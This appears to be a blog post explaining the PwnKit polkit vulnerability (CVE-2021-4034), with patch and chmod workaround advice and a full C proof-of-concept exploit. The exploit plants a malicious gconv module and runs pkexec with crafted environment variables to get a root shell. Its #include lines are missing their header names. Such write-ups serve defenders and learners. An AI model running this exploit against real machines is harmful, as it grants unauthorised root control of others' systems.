A memory corruption vulnerability (CVE-2021-4034) in PolKit, a component used in all major Linux distributions and in some Unix-like operating systems, has just appeared and can be easily exploited by unprivileged local users to gain full root privileges.
This vulnerability is really interesting given how easy it is to exploit. Moreover, it has been exploitable since Polkit was introduced in 2009. For 13 years we have been exposed to this memory corruption without realising it. How many other vulnerabilities that we are not aware of are yet to be discovered?
In this post I will explain how this vulnerability works and show you a Proof of Concept to see how to exploit it.
Polkit
Polkit (Policy Kit) is a Linux utility tool that allows processes running with low privileges to communicate with privileged processes. Polkit’s pkexec command can be used to execute commands that require root permissions.
CVE-2021-4034 - PwnKit
One of the keys to this vulnerability is that it is extremely easy to exploit, so much so that although the researchers at Qualys did not make the exploit public, in a few hours different people appeared sharing their own exploits on how to exploit the vulnerability.
Interestingly, although it is a memory corruption vulnerability, it can be exploited immediately, reliably and regardless of operating system architecture type. Furthermore, Polkit does not need to be running in order to exploit the vulnerability.
It is a local vulnerability, so it is necessary to have access to the victim machine to execute it, but it provides immediate privilege escalation.
Solution
Patches have already been released to fix this problem, so it is sufficient to update the operating system so that the vulnerability cannot be exploited.
If this is not possible, a workaround would be to reduce the privileges with which the pkexec program runs, using the following command:
chmod 0755 /usr/bin/pkexec
PwnKit - Proof of Concept
Let’s start by outlining the technical details of the exploit.
Usually insecure environment variables are removed from SUID programs (programs that can be run with the same privileges as the file owner). This is always done by the dynamic linker (the ld.so and ld-linux.so programs) before the main function of the program is executed.
The exploit takes advantage of an out-of-bounds write vulnerability. This vulnerability allows reintroducing into the pkexec environment an insecure environment variable such as LD_PRELOAD, a variable that tells the program the paths to shared libraries or objects to use and loads them into another library during execution.
If you want a more technical explanation, you can find it in the advisory note published by Qualys.
The exploit takes advantage of this to indicate in the environment variable the malicious code to be executed with administrator privileges, which allows us to generate a shell from which we have root access to the entire operating system:
#include
#include
#include
char *shell =
"#include \n"
"#include \n"
"#include \n\n"
"void gconv() {}\n"
"void gconv_init() {\n"
" setuid(0); setgid(0);\n"
" seteuid(0); setegid(0);\n"
" system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
" exit(0);\n"
"}";int main(int argc, char *argv[]) {
FILE *fp;
system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
fp = fopen("pwnkit/pwnkit.c", "w");
fprintf(fp, "%s", shell);
fclose(fp);
system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
execve("/usr/bin/pkexec", (char*[]){NULL}, env);
}
The exploit code I have shown is from Andris Raugulis and you can find it here, however there are others like the one from Blasty that you can find here.
Below is the demonstration of the Proof of Concept, just compile and run the file:
And that’s it! I hope you enjoyed this post. As you can see, the PwnKit vulnerability is easily exploitable and affects most Linux distributions. A few months ago, another vulnerability came out, CVE-2021-3560, related to pkexec that allowed privilege escalation and that was also exposed in all Linux distributions for almost a decade and ready to be exploited. How many more will remain to be discovered?
Lethani.